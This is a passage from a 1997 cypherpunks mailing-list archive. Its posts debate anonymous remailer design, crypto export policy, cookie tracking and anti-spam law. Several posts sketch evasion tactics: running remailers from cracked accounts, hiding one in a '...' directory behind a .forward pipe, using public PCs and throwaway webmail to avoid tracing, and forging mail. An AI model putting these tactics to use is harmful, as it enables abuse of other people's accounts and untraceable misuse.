configured to confirm reply blocks, which they always are. 

Back to the subject: Disposable remailers. It seems the juno remailer
software would be good for this. I'm not sure what the sign-up requirement
are, but it's free. I was also thinking about web-based free mail
services, such as Hotmail and Rocketmail. Receiving mail means having to
parse some HTML, which from the looks of things is do-able but not
trivial. Sending mail might be easier to implement.

Which brings up an interesting idea for an exitman/middleman remailer: Use
a nym or commercial ISP to receive the mail, use throwaway free mail
accounts for delivery (maybe even just plaintext delivery). Hotmail, at
least, inserts an X-Originating-IP:  header, though.  I expect others do
the same. So put your remailer output on a ZIP disk or floppy and run your
delivery on whatever public or semi-public access machine you happen to
get your hands on, once or twice a day.

Andy Dustman / Computational Center for Molecular Structure and Design / UGA
    To get my PGP public key, send me mail with subject "send file key".
For the ultimate anti-spam procmail recipe, send me mail with subject "spam"
"Encryption is too important to leave to the government."  -- Bruce Schneier
http://www.ilinks.net/~dustman    mailto:andy at CCMSD.chem.uga.edu      <}+++<



-----BEGIN PGP SIGNATURE-----
Version: 2.6.3ia
Charset: noconv

iQEPAwUBM+pqRBOPBZTHLz8dAQHyvAfPddrITrYKYCB7gmWuMyJxwWkCi+8oaZPZ
Q3EMlQ2+Jfhw0gSHKYwfVHok6ttU5pGy3epwVBXSYAfs5Tge++3q2ZmoUAPuLRgx
1jv3akJnNrgnxTXVRNdrJDRs3rK1/5Xz7+GunK/zbdyicjxBJzVNaJL17i1R/Xr+
/r36YiBcueQBaEdJI3uqF08rj/63CFVuX5n6lun0cBvPxNK2wJ0WBknQeZsPHAjQ
jbzu0hAkWZ1WYXLtLanzbn7TQrgMkMnVoRvu6JSdtxYEywd2aYhS/F1N6SKk6FiE
DVEnoPRE42U/utHrEX30heLrSbD/fbwTruR1f1H4lTWMOg==
=en6+
-----END PGP SIGNATURE-----






From mclow at owl.csusm.edu  Fri Aug  8 00:38:50 1997
From: mclow at owl.csusm.edu (Marshall Clow)
Date: Fri, 8 Aug 1997 15:38:50 +0800
Subject: Export Tax vs ITAR as a compromise ...
In-Reply-To: <199708072032.NAA20409@ohio.chromatic.com>
Message-ID: 



>How about this as a political compromise ...
>
>1.  Allow any export of crypto.
>
>2.  Tax crypto exports heavily, say 25% or something
>    like that, unless key recovery (or some other
>    GAK-ish feature) is part of the product.  For
>    instance, structuring the taxes so that ...
>
>        GAK-only     products get taxed   0%
>        GAK-optional products get taxed  20%
>        non-GAK      products get taxed  25%
>
If this were in force, and I were someone like, say, PGP,
I would export a single copy of my program to a confederate
overseas who would then duplicate it and sell it abroad,
sending royalty payments back to me.

25% of $50 is um... $12.50.

Lots of revenue there.

-- Marshall

Marshall Clow     Aladdin Systems   

"In Washington DC, officials from the White House, federal agencies and
Congress say regulations may be necessary to promote a free-market
system." --  CommunicationsWeek International April 21, 1997







From jya at pipeline.com  Fri Aug  8 00:38:56 1997
From: jya at pipeline.com (John Young)
Date: Fri, 8 Aug 1997 15:38:56 +0800
Subject: Shor's Algorithms: Mad, Bad and Dangerous
Message-ID: <1.5.4.32.19970808011215.00738ee8@pop.pipeline.com>



>From a WSJ nook review today of "The Fabirc of Reality,"
by David Deutsch (Allan lane, 390 pp., $29.95):

  Using something called "Shor's algorithm," a quantum
  computer can factor giant numbers and thereby break
  secret codes that no conventional computer could touch.

  The only way it could do this, Mr Deutsch argues, is by
  distributing its operations over many parallel universes.
  "To those who cling to a single-universe world-view,"
  he writes with evident asperity," I issue the challenge:
  *explain how Shor's algorithms works.*"

  Combining the many-universes notion with quantum probablity,
  and adding elements of Darwinism and Karl Popper's theory
  of knowledge, Mr. Deutsch apsires to nothing less than a
  complete understanding of "the fabric of reality." Arrogant
  in tone and marred by leaps of logic, his book nonetheless
  bristles with subversive insights about virutal reality,
  time travel, mathematical certainty and free will. 
  Intellectually speaking, Mr. Deutsch is mad, bad and 
  dangerous to know.






From anon at anon.efga.org  Fri Aug  8 00:40:06 1997
From: anon at anon.efga.org (Anonymous)
Date: Fri, 8 Aug 1997 15:40:06 +0800
Subject: TEST [Ignore]
Message-ID: 



test






From andy at CCMSD.chem.uga.edu  Fri Aug  8 00:40:53 1997
From: andy at CCMSD.chem.uga.edu (Andy Dustman)
Date: Fri, 8 Aug 1997 15:40:53 +0800
Subject: disposable remailers (was Re: Eternity Uncensorable?)
In-Reply-To: <199708080147.CAA00946@server.test.net>
Message-ID: 



-----BEGIN PGP SIGNED MESSAGE-----

On Fri, 8 Aug 1997, Adam Back wrote:

> Andy Dustman  writes:
> > 
> > Back to the subject: Disposable remailers. It seems the juno remailer
> > software would be good for this. I'm not sure what the sign-up requirement
> > are, but it's free. I was also thinking about web-based free mail
> > services, such as Hotmail and Rocketmail. Receiving mail means having to
> > parse some HTML, which from the looks of things is do-able but not
> > trivial. Sending mail might be easier to implement.
> 
> Sending mail is your problem alright.  It's where you get hit by
> spammers etc.

Ah, but if you only send through the disposable address, who cares? The
actually remailer address should never get seen (except on remailer lists,
of course). You could probably get away with never reading any incoming
mail, so spammers are not a problem.

> Wasn't there an email forgery web page around for a while.  The idea
> was that you filled in the details of who you wanted to send to, what
> address you wanted it to appear you had sent it from, and paste your
> message in this form box.  It did some kind of crude sendmail forgery
> for you.

Hmmm. Someone has recently been forging mail to appear to be from cracker
through something like this (very bad forgery, headers are all wrong).

> > Which brings up an interesting idea for an exitman/middleman remailer: Use
> > a nym or commercial ISP to receive the mail, use throwaway free mail
> > accounts for delivery (maybe even just plaintext delivery). Hotmail, at
> > least, inserts an X-Originating-IP:  header, though.  
> 
> No problem -- run it through www.anonymizer.com first :-)

Sure, Lance won't mind, right? At least, not if we subscribe... ;) Maybe
we need a network of anonymizing web proxy servers... 

> > I expect others do the same. So put your remailer output on a ZIP
> > disk or floppy and run your delivery on whatever public or
> > semi-public access machine you happen to get your hands on, once or
> > twice a day.
> 
> You'd not want to use the same public access account regularly.

I'm not thinking of an account so much as maybe a PC in a university
computer cluster. Pick one and go. At a big university there should be
several clusters around campus.

> I think the connecting to the web based interface of one of those free
> web gateways via www.anonymizer.com web based interface has potential.

It does, but I know The Anonymizer blocks some sites, at their request.

> How much trouble can you get in with ISPs for forging email?  Do they
> care?

Mindspring cares. My ISP was absorbed by them about two weeks after I
signed up. They say in their terms of service that impersonating someone
else is forbidden, but they specifically allow the use of anonymous
remailers and nicknames. I assume this means forging is frowned upon,
unless you are impersonating someone who doesn't exist, I guess.

Andy Dustman / Computational Center for Molecular Structure and Design / UGA
    To get my PGP public key, send me mail with subject "send file key".
For the ultimate anti-spam procmail recipe, send me mail with subject "spam"
"Encryption is too important to leave to the government."  -- Bruce Schneier
http://www.ilinks.net/~dustman    mailto:andy at CCMSD.chem.uga.edu      <}+++<


-----BEGIN PGP SIGNATURE-----
Version: 2.6.3ia
Charset: noconv

iQEPAwUBM+qADROPBZTHLz8dAQHJBwfQim/nARDmP1GQq/hV9duWoO+lRF4bE+D5
RoAibhsZUpyR1vBu754PX2OOAPIjVq+i0UkdFm17bn40zZz9FnJRo/RRead0JdYm
GVO0KSll1AkJsZCtCIWLwIrrwlFKfRehhBJsfLqSat0XF9sI5L8V8npg4bng4hOm
zmTLtbgaRM7wd25hm6Ld4EdCNRyz9BK/2jt1VBemo1X8mKMDgAbk9APn4V4t5u0A
KgN6Btpl+aYs5IUgPRz1D7gFPCcsNWz1JmB/hbdS+r4NL5+/6i/+f/0v7kwmlNMa
P7fQjiIa+/fq8ZMdKfUAwPN0R0VxYT09kC0gtPQU5pkxHQ==
=jH4c
-----END PGP SIGNATURE-----






From declan at pathfinder.com  Fri Aug  8 00:41:19 1997
From: declan at pathfinder.com (Declan McCullagh)
Date: Fri, 8 Aug 1997 15:41:19 +0800
Subject: Query on cookies
In-Reply-To: 
Message-ID: 



I believe this is what the folks at Netscape tried to eliminate in 4.0,
which I'm told features four cookie settings. One rejects "third party
cookies."

-Declan


On Thu, 7 Aug 1997, Dr.Dimitri Vulis KOTM wrote:

> Declan McCullagh  writes:
> 
> > Thanks for the help, folks. This is for an article on privacy I was
> > working on, and I found the info I needed. For instance, Netscape's
> > explanation of the protocol left me wondering about whether cookies from
> > acme.com could be requested by competitor.com.
> The answer is YES, although it requires a little work.
> 
> Suppose that you point your browser at http://www.A.com/index.html.
> 
> Suppose that file contains an .
> The CGI file displays a little picture, and also gets or sets a cookie.
> 
> Suppose you next browse http://www.C.com/index.html, and it too
> contains the same .  Since the cookie is "owned" by B.com,
> not A.com or C.com, the cgi file can track your movement from A.Com to
> B.Com.
> 
> 
> ---
> 
> Dr.Dimitri Vulis KOTM
> Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps
> 
> 






From frissell at panix.com  Fri Aug  8 00:44:12 1997
From: frissell at panix.com (frissell at panix.com)
Date: Fri, 8 Aug 1997 15:44:12 +0800
Subject: Clinton's threat of line-item veto affect crypto bill?
In-Reply-To: <3.0.32.19970807082355.00708b40@best.com>
Message-ID: <3.0.2.32.19970807195514.037903ac@panix.com>



-----BEGIN PGP SIGNED MESSAGE-----

At 01:34 PM 8/7/97 -0700, geeman at best.com wrote:
>Read my earlier post re: this.  Clinton already said he'd veto SAFE.

Yes, "Fighting Bill" Clinton may be the one who saves us from outlawing 
crypto used in the course of a crime.  Then when the courts throw the export 
ban out...


DCF
-----BEGIN PGP SIGNATURE-----
Version: PGP for Personal Privacy 5.0
Charset: noconv

iQCVAwUBM+pgYIVO4r4sgSPhAQFOiAP/ZsHiaf8y1mFxoCW0N6h4p6vjvd/mm9YV
ZPy76w2NIVkVSKGLFm4xOmd2mPo2gpoG1Bgcdxj8Q2SQFOqbSkhnkPbOcf332JG8
IJaEM4cKRZfYlnk5sZiIKXUZsK/w10B/AH42gibqctI1f7yS5Ijs5B5eenc/6u9X
mpUg4P3wz70=
=2QJm
-----END PGP SIGNATURE-----






From jsmith58 at hotmail.com  Fri Aug  8 00:47:09 1997
From: jsmith58 at hotmail.com (John Smith)
Date: Fri, 8 Aug 1997 15:47:09 +0800
Subject: Exit Remailer Suggestion
Message-ID: <19970807233007.6487.qmail@hotmail.com>



ACTIVE

Maybe your remailing software could connect to a URL like this and
imitate the action of typing in mail.  But it might have to login
first.  Hotmail asks you to log out if you don't plan to use the
system any more for a while.  So it seems like it keeps some kind of
record of who is logged in.

A good project would be to make an exit remailer whose only job was
to choose from a random list of hotmail accounts and redirect mail.
It wouldn't have to have a lot of complicated cryptography, it would
just be for the last step.

"John


______________________________________________________
Get Your Private, Free Email at http://www.hotmail.com






From tcmay at got.net  Fri Aug  8 00:47:45 1997
From: tcmay at got.net (Tim May)
Date: Fri, 8 Aug 1997 15:47:45 +0800
Subject: anti-spam law implies laws against remailers? (was Re: bulkpostage fine)
In-Reply-To: <19970806075802.12530@bywater.songbird.com>
Message-ID: 



At 10:05 AM -0700 8/6/97, Adam Back wrote:

>2) When the government or whoever wants to sue someone for spam they
>   will have to prove who the spammer is.  (Right?)  So now they'll
>   look at the From address at it will say remailer at foo.com.  So
>   they'll go have a chat to Fred Q Cypherpunk who operates foo, and he
>   won't be able to cooperate because he doesn't keep logs.  They won't
>   be happy with Fred, and will pass this information along to him by
>   stealing his equipment, prosecuting him for assisting in a felony
>   crime (they'll make it a felony right?), lock him and throw away
>   the key.  But what about Freds constitutional protection of the
>   speech forwarded by his remailer?  (Judge + congress-critter:
>   Constitution wassat?)

Delivery services are not held liable for the contents of the packages they
deliver, generally. (If they are parties to the crime, natch. And some say
they can be compelled to assist in law enforcement activities.)

Nor are delivery services required to "know their customer" or to have
ironclad proof of where a package originated. (Hell, even the U.S. Postal
Service allows mail with no valid return address, and this was my
experience in Europe as well.)

The "From:" field in e-mail is not to be confused with the "originator"
(whatever that may be).

Not even the U.S. courts are so dumb as to accept the claim that a package
delivered by the U.S. Postal Servie or by UPS means that Joe Deliveryman is
the "sender."

When this "From:" thing eventually gets to a court, I expect this
distinction will be obvious to all.

Remailers are just middlemen in a delivery process.

(Further protection in the U.S. comes from the ECPA, of course, which
explicitly makes it illegal for a middleman to examine e-mail. How can they
screen e-mail for illegal words if they are forbidden to look?)


--Tim May



There's something wrong when I'm a felon under an increasing number of laws.
Only one response to the key grabbers is warranted: "Death to Tyrants!"
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay at got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^1398269     | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."









From rwright at adnetsol.com  Fri Aug  8 00:57:14 1997
From: rwright at adnetsol.com (Ross Wright)
Date: Fri, 8 Aug 1997 15:57:14 +0800
Subject: forged cancels (Re: Entrust Technologies's Solo - free
Message-ID: <199708071951.MAA21851@adnetsol.adnetsol.com>



On or About  7 Aug 97 at 0:18, Dr.Dimitri Vulis KOTM wrote:

> ? the Platypus {aka David Formosa} 
> writes:
> 
> > > Once the offending articles are part of the spool on toher site,
> > > it's pointless for me to issue cancels.
> >
> > Not even to free up diskspace?
> 
> Correct.

For no reason whatsoever should you cancel a message you did not send 
yourself.

See:

http://www.npr.org/plweb-cgi/fastweb?getdoc+npr+npr+12142+2+wAAA+spam

NPR's Jim Zarroli reports that UUNet, the Internet service provider
whose billboards were blocked, condemned the action and called the
incidents "digital terrorism"

Ross 

=-=-=-=-=-=-
Ross Wright
King Media: Bulk Sales of Software Media and Duplication Services
http://www.slip.net/~cdr/kingmedia
Voice: (408) 259-2795






From andy at CCMSD.chem.uga.edu  Fri Aug  8 00:57:29 1997
From: andy at CCMSD.chem.uga.edu (Andy Dustman)
Date: Fri, 8 Aug 1997 15:57:29 +0800
Subject: disposable remailers (was Re: Eternity Uncensorable?)
In-Reply-To: <199708071945.UAA04602@server.test.net>
Message-ID: 



-----BEGIN PGP SIGNED MESSAGE-----

On Thu, 7 Aug 1997, Adam Back wrote:

> You know how middleman operators work...  they always, always send
> mail via another remailer and never deliver mail to a user.  (I'm not
> sure if they detect this by looking to see if the address is on the
> remailer list, or just always add an extra hop?)

I think by definition a middleman always chains through one or more
additional remailers. When I ran dustbin, it was a "smart middleman",
i.e., if the recipient was a known remailer, it wouldn't bother to chain
(remailers rarely complain), otherwise it would chain through a single
remailer. I have a procmail script which does this as well using mixmaster
only (some definitions are missing here): 

# Smart middle. If not to another remailer, send it through a random mixmaster.
# Mixmaster 2.0.3 compatible.

:0 f
* MIDDLE ?? (on|yes)
*! ? grep "$TO" $RLIST $TYPE2
| formail -bf -I"From:" -I"To:" -I"Comments:" -IMessage-ID: \
        | $MIXPATH/mixmaster -f -to $TO -l 0 

# We made it this far, so send out the mail.

:0
| $SENDMAIL $SENDMAILFLAGS 

An even smarter middleman would detect PGP messages and deliver those
directly to end recipients, since those people are unlikely to complain
about anonymous mail, and chain if the message was plaintext. The risk
involved with this type of middleman operation should be rather small.

Andy Dustman / Computational Center for Molecular Structure and Design / UGA
    To get my PGP public key, send me mail with subject "send file key".
For the ultimate anti-spam procmail recipe, send me mail with subject "spam"
"Encryption is too important to leave to the government."  -- Bruce Schneier
http://www.ilinks.net/~dustman    mailto:andy at CCMSD.chem.uga.edu      <}+++<


-----BEGIN PGP SIGNATURE-----
Version: 2.6.3ia
Charset: noconv

iQEPAwUBM+ouuhOPBZTHLz8dAQFMaQfPYwBpG+f05Oq/gu4nZDacu+0DDg/v/EgI
IOZa4GCrNlhfbl0mp0XFLbEWLi8SvwWhpo6nhOFDIda7wcmyo032TfbcajNPEcz7
qeRNBEY2wDwp9B9MaXZlFyThnmnqsfgeU0h/c+txPiV48HsiX2uvG1NEKumqxq+e
R1nqBS6Ob5uP+1urfqAbrdeTPdRSwlx+C9SlxMLLYpoPq5OM8YZu08UOBVWRE2FD
ia4DvHCWVBsj2rpgiDrpWyMHAEbkoy9FJm5qUa2FqZq62TrS0rVugdjsE4mvisjM
ULoalmkRHsByl/qUICRqSpktQQtveq2I3MEIHYSk7tEVJQ==
=0FkI
-----END PGP SIGNATURE-----






From geeman at best.com  Fri Aug  8 00:57:51 1997
From: geeman at best.com (geeman at best.com)
Date: Fri, 8 Aug 1997 15:57:51 +0800
Subject: Commerce/Reinsch: Encryption's in the Federal Spotlight
Message-ID: <3.0.32.19691231160000.00713978@best.com>



>Encryption's In The Federal Spotlight
>(08/05/97; 9:00 a.m. EDT)
>By Darryl K. Taft, Computer Reseller News
>
>WASHINGTON -- President Clinton is determined to push electronic
>commerce forward, but when it comes to encryption, some safeguards need
>to remain in place because of law enforcement and national security
>concerns, said William Reinsch, the U.S. Department of Commerce's
>undersecretary for export administration.
>
>Speaking at the National Computer Security Association's (NCSA)
>Electronic Commerce Security conference here, Reinsch reiterated that
>the
>president and U.S. policy favors an electronic marketplace that is not
>regulated by the government.
>
>"It's obvious our policies about encryption is a piece of the large
>puzzle that
>doesn't quite fit our definition of a free market," said Reinsch,
>adding, "The
>increased use of encryption carries with it serious risks for public
>safety and
>our national security. Any policy on encryption must address these risks
>as
>well if it is to be in the national interest. Our policy provides that
>balance by
>working in close consultation with the private sector and by working
>with the
>market, not against it."
>
>William Murray, an executive consultant with Deloitte & Touche,
>disagreed.
>Murray said the present government policy favors security and ease of
>investigation over crime prevention and "the lawless over the law
>abiding. I
>know of no criminals who are worried about the administration's
>policies, but
>my law-abiding clients are."
>
>Murray, who also spoke at the NCSA conference, said he believed the
>government's policy is "sowing so much fear, uncertainty and doubt that
>it is
>the single most incapacitating thing we have to deal with."
>
>Meanwhile, Reinsch outlined several areas where he said he felt the
>administration's policies regarding export control and key management
>are
>making a difference. Reinsch said new regulations creating a license
>exemption that allows recoverable encryption products of any strength
>and
>key length to be exported freely after a single review by the Department
>of
>Commerce, the Department of Justice and the Defense Departments.
>
>To encourage the development of recoverable encryption products, the
>government created a special two-year liberalization period during which
>companies may export 56-bit DES or equivalent products, provided they
>show that they are working to develop the key management infrastructure
>envisioned by the administration, Reinsch said.
>
>Perhaps the best gauge of industry response to the administration
>policies has
>been the flow of applications for exports, Reinsch said. In the seven
>months
>since the policy went into effect, the Commerce department received more
>than 100 license applications for exports, valued at more than $500
>million.
>In addition, Reinsch said 33 companies have submitted plans on how they
>will build key recovery products, and the Commerce department approved
>29 of them with more to come. "None have been rejected," Reinsch said,
>noting that he could only name the companies that have already announced
>their applications, such as Netscape Communications, IBM, Trusted
>Information Systems and Digital Equipment.
>
>Reinsch said the market continues to be confusing because "companies
>might
>say one thing in private with the government and then take a totally
>different
>position publicly." Murray said, "The government does the same thing."
>
>Moreover, Reinsch said industry concerns that foreign availability of
>encryption products appear to be exaggerated. "We do not yet see
>widespread foreign use of encryption," he said. "We've discovered that
>every
>country is going through the same issues we are." 
>
>
>






From hua at chromatic.com  Fri Aug  8 00:57:56 1997
From: hua at chromatic.com (Ernest Hua)
Date: Fri, 8 Aug 1997 15:57:56 +0800
Subject: Export Tax vs ITAR as a compromise ...
Message-ID: <199708072032.NAA20409@ohio.chromatic.com>



How about this as a political compromise ...

1.  Allow any export of crypto.

2.  Tax crypto exports heavily, say 25% or something
    like that, unless key recovery (or some other
    GAK-ish feature) is part of the product.  For
    instance, structuring the taxes so that ...

        GAK-only     products get taxed   0%
        GAK-optional products get taxed  20%
        non-GAK      products get taxed  25%

3.  Give this revenue upside to the FBI/CIA/NSA/NRO.

Internet commerce products alone would bring in shit
loads of revenue for these agencies.  And, as a
side-benefit for these agencies, many companies will
opted for GAK just for export tax reasons.

This, of course, will not please the crypto-purists,
but crypto is just one of many areas where the
government is feeling like it is losing control.  And
while that attitude is just infantile, we have to be
realistic about those very human people and very human
organizations who have a tough job to do.  As much as I
hate ITAR, I feel really bad for the NSA.

----

1.  Fundamentally, I only oppose ITAR on First
Amendment grounds: I should be able to write any
program I can type, and I should be able to give that
program out.  This is computer speech, but it sure is
speech.  Therefore, my personal interest is to perserve
that freedom.  (If I happen to write a book about
dangerous chemicals or explosives [write crypto code],
why should I be held criminally liable if a terrorist
buys my book [downloads my source code] or steals it
from a library [intercepts an E-Mail containing the
sources].)

2.  My guess is that the NSA has NOT really advanced
the state of the art of crypto much.  I suspect they
have capabilities that are maybe one or two orders of
magnitude (in terms of art, not pure bruteforce
resources) ahead of us common folks, but we can crank
up the computational complexity without a wink, and
then, they are just helpless.  One particular
rumoroid/factoid worth keeping in mind is that they
have succeeded in the past, not just by being smarter,
but also by dumbing-down everyone else.  Sooner or
later, that part of the strategy will no longer work.

3.  There is something to be said for controlling
export and import of products when the rest of the
world is not using a economic system quite like ours.
There is also something to be said for controlling
export of products that might reduce our national
strategic advantage (whatever that means).

Of course, there is also self-delusion, and, if I were
to assume the FBI/NSA is being completely honest,
self-delusion is what they seem to be falling back on.
I mean, REALLY now, if you can't control huge cabinets
of supercomputers (oops ... I guess they are just
desktop pizza boxes now, aren't they?), how are you
going to control bits?

Ern






From geeman at best.com  Fri Aug  8 00:58:59 1997
From: geeman at best.com (geeman at best.com)
Date: Fri, 8 Aug 1997 15:58:59 +0800
Subject: Clinton's threat of line-item veto affect crypto bill?
Message-ID: <3.0.32.19970807082355.00708b40@best.com>



Read my earlier post re: this.  Clinton already said he'd veto SAFE.

At 10:00 AM 8/5/97 -0700, stewarts at ix.netcom.com wrote:
>
>At 04:36 PM 8/4/97 -0700, Ernest Hua wrote:
>>Does anyone have any idea whether Clinton's threat of using the
>>line-item veto against portions of the big spending bill could
>>be leverage against some pro-SAFE legislators?
>
>The line item veto doesn't eliminate the political games in the budget,
>it just changes the details a bit.  Sure, he could threaten to
>veto their favorite pork-barrel projects for crossing him on crypto,
>just as he could threaten to veto them if they don't support
>his favorite pork.  But as someone else said, he can threaten to
>veto the crypto bill itself, or (perhaps worse) threaten to veto it
>unless it's "balanced", by including controls on domestic cryptography
>in return for letting Big Business export more products.
>
>
>#			Thanks;  Bill
># Bill Stewart, +1-415-442-2215 stewarts at ix.netcom.com
># You can get PGP outside the US at ftp.ox.ac.uk/pub/crypto/pgp
>#   (If this is a mailing list or news, please Cc: me on replies.  Thanks.)
>
>
>






From declan at well.com  Fri Aug  8 00:59:10 1997
From: declan at well.com (Declan McCullagh)
Date: Fri, 8 Aug 1997 15:59:10 +0800
Subject: Money magazine on Internet gambling
Message-ID: 



A colleague of mine down the hall at Money magazine just stopped by and
asked for help on a Net-gambling story. I think she's interested in the
offshore issues -- but this being Money, I think they're looking for
horror stores as well. (Junior running up a $20,000 tab on Daddy's credit
card. You know the drill.) I already gave her my copy of the July Wired
with Charles Platt's article on FC97, told her about Sen. Kyl's bill, and
gave her the URL to MSNBC's special report.

If anyone wants to give her a call, email me for her phone number.

-Declan

PS: Thanks to everyone who responded about the digital cash story for
Money earlier this summer. I printed out all the responses I got and
forwarded them along, but the story got killed...







From dlv at bwalk.dm.com  Fri Aug  8 00:59:20 1997
From: dlv at bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Fri, 8 Aug 1997 15:59:20 +0800
Subject: Query on cookies
In-Reply-To: 
Message-ID: 



Declan McCullagh  writes:

> Thanks for the help, folks. This is for an article on privacy I was
> working on, and I found the info I needed. For instance, Netscape's
> explanation of the protocol left me wondering about whether cookies from
> acme.com could be requested by competitor.com.
The answer is YES, although it requires a little work.

Suppose that you point your browser at http://www.A.com/index.html.

Suppose that file contains an .
The CGI file displays a little picture, and also gets or sets a cookie.

Suppose you next browse http://www.C.com/index.html, and it too
contains the same .  Since the cookie is "owned" by B.com,
not A.com or C.com, the cgi file can track your movement from A.Com to
B.Com.


---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps






From aba at dcs.ex.ac.uk  Fri Aug  8 00:59:42 1997
From: aba at dcs.ex.ac.uk (Adam Back)
Date: Fri, 8 Aug 1997 15:59:42 +0800
Subject: disposable remailers (was Re: Eternity Uncensorable?)
In-Reply-To: 
Message-ID: <199708071945.UAA04602@server.test.net>




Uggh another post which turned out hugely long... I cc'd to remailer
ops due to remailer operator relevance.

Steve Schear  writes:
> >> On Wed, 6 Aug 1997, Adam Back wrote:
> >I propose that an exit remailer is replaceable, that is another
> >remailer can instantly step into it's place and take traffic.  The way
> >to do this is to have a special automated reporting mechanism for
> >exitman remailers.  An easy way to do it is to have the exitman
> >remailers send mail to a given mailing list.  Other remailers which
> >wish to use exitman remailers just subscribe to the chosen mailing
> >list.  We just need a remailer command indicating the creation of a
> >new exitman remailer.  I guess the exitman remailer just sends one
> >message per day, or whatever, and if it stops, you write it off.
> 
> A possible problem is the motivation of those setting up decoys.  If
> they're doing it to help thwart remailer abuse, fine.  But what if
> their intent is to thwart remailers?  Couldn't these dissidents set
> up black-hole remailers which are simply information sinks?  

Good point, they could indeed.

There is another related problem which is a real thorny one:

  Being exit only, the attacker will by definition know the email
  address the messages it forwards are being sent to.  The attacker is
  trying to maximise his ability to disrupt, so he will be trying extra
  hard to conceal from remailer operators and their community that he is
  disrupting.

  Clearly the clever attacker in this situation, trying to disrupt the
  exitman-using middleman remailers reliability will let through
  anything going to a public forum, or to an email address he suspects
  is anything to do with Raph's pinging service.  (Eg any address on the
  cypherpunks list or remailer-ops list as possible collaborators in the
  remailer reliability pinging).

  If the attacker is a Fed or spook or whatever, he will have good
  resources and ability to correlate destination email addresses to
  cypherpunks list members.  Eg you get an account somewhere, they can
  find out by looking at your credit card logs, or whatever.

Counter-measures?

1) Counter measure #1

   A sop I can offer to this difficulty of detecting denial of
   service attacks, is that perhaps you could have the last middleman
   remailer send to a bunch of different randomly selected exitman
   remailers.  So when you get some anonymous mail you get 10 copies of
   it.

   That way you can work out some stats for how likely someone who is
   operating 10 of 20 exit man remailers is to stop a given mail
   getting through.

 1a) Counter-counter measure to 1)

     However if some of these remailers are operating from cracked
     accounts, rather than from anonymously purchased accounts, the
     attacker has an easy job of increasing his percentage of exitman
     remailers: take out the existing ones.  Simple just email the admin
     of the cracked account -- he'll remove it.

2) Counter measure #2

   Another idea, but really quite manual, would be to pick people who
   have advertised PGP keys, send them mail via some exitman remailer,
   and ask them politely to forward it to you.

   (Clearly sending through requests to "let me know if you recieve
   this email" aren't going to be recognized by the attacker, and let
   through if we send mail to people who don't have encryption
   capability).

 2a) Counter-counter measure to 2)

     Course then the attacker can counter by letting through any
     encrypted mail without question.  Stuck there aren't we :-(

3) Counter measure #3

   Scraping the barrel here: what if we enlist the help of exitman
   remailers to check up on other exitman remailers?

   So now lets say we don't release a list of exitman remailers, but
   rather each exitman remailer privately announces itself to one
   randomly selected remailer privately.

   This is better in general because there is now no publically known
   list of exitman remailers.  It is now harder for someone to
   use the list to just email all the admins in the hope that they
   will revoke paid for accounts (attacker makes legal threats,
   claiming to have receiving illegal material from this account or
   whatever), or to remove hacked accounts (real easy this one).

   With this setup we can send mail to one exit man via another one,
   with some chance that the first exitman won't recognize the other
   exitman.  (You wouldn't want to overdo it with repeated mail, or
   the corrupt exitman might start to suspect the mail was another
   exitman).

  3a) counter-counter measure to 3)

      It might be relatively easy for the well funded attacker to work
      out which addresses of those it receives to forward to are
      accounts with exitman installed.  Eg. Watch the traffic from the
      host, after sending a bunch messages through remailers.  Or
      simply finger the account see if the user ever logs in.  (If it
      was hacked, it could be an active account, the user might never
      look at the forward file with |/home/oliver/... , nor the
      exitman remailer installed as "..." in some directory -- if it's
      working properly they won't see the email, and if it's forging
      email well they see replies).  Incidentally exitman remailer
      hidden in "..." would allow a user to install it himself and
      plausibly claim ignorance, a more subtle way to obtain
      "disposable" exitman remailers.  Best run from clearly
      non-technical users accounts with the knowing assistance of a
      technical assitant.

4) counter measure #4

   An exitman remailer pinging service would be easily feasible for
   the post to USENET aspect (or to known mailing list), as the
   exitman remailer would show itself up quickly in this case.

   However I'm not sure this is so useful as mail2news gateways, and
   public postings generally (*) generate a lots less agro for their
   operators than a remailer.  This is because people don't have to
   read USENET, and don't feel nearly so threatened as when they
   receive an anonymous mail aimed at them.  And also because the
   mail2news gateway puts the senders address in the From field, which
   points the finger at the exit remailer anway.  mail2news seems to
   be viewed as more neutral.  If any mail2news operators have
   experiences which suggest otherwise I'd be interested to hear.

   (*) I did read of one case on remailer-operators where someone got
       hit by a remailer hater who used a remailer to post a fake
       advertisement of a CD full of commercial warez.  The
       remailer-hater then anonymously tipped off the SPA.

   Incidentally I say "remailer-hater" here, but I should probably use
   a more term "remailer-attacker" or something, there could also
   feasibly be someone who is actually on our side (in a Zen sort of
   way) and trying to get us to face and solve the DoS and operators
   liability issues with technical solutions by demonstrating the
   current weaknesses.


Some of these attacks are interesting for ordinary remailers also.
Perhaps there exist right now normal (non-middleman) remailers which
will send to another remailer in case it is a ping message, and
anything that looks like an attempt to deliver to Raph, but junk the
rest.

Would we know?


Anyway, overall I think the difficulty in checking on exitman
remailers overall probably means that this simplest practical
compromise for mail delivery from exitman remailers is for the last
middle man remailer to send the mail to multiple exitman remailers.

I also think the that the idea of exitman remailers privately
announcing themselves to selected remailers might mean that they last
longer, otherwise remailer haters will contact the admins and cause
hassle even if they can't correlate any particular message came from a
given remailer due to good mail forgery on the part of the exitman
remailer.

And using exitman remailers to post to USENET might be useful at some
point if open access mail2news gateways got scarce.

> When a email is chain-remailed and doesn't get delivered many, but
> not all, senders would simply assume one of the remailers are having
> delivery problems and resend.  Will Raph's approach work to monitor
> decoys when their number and identity are constantly changing?

In theory yes.  Send it via a couple of exitman remailers to make sure
if you like.  However the smart DoS attack described above is much
harder to counter.

> Won't this significantly complicate remailer clients?

Nope.  The client won't need to know.  You're not expected to send
directly to an exitman remailer.  That is something for remailer
operators to use.

You know how middleman operators work...  they always, always send
mail via another remailer and never deliver mail to a user.  (I'm not
sure if they detect this by looking to see if the address is on the
remailer list, or just always add an extra hop?)

So if there are some exitman remailers, a remailer operator that gets
sick of the heat can switch to a new kind of middleman mode, where he
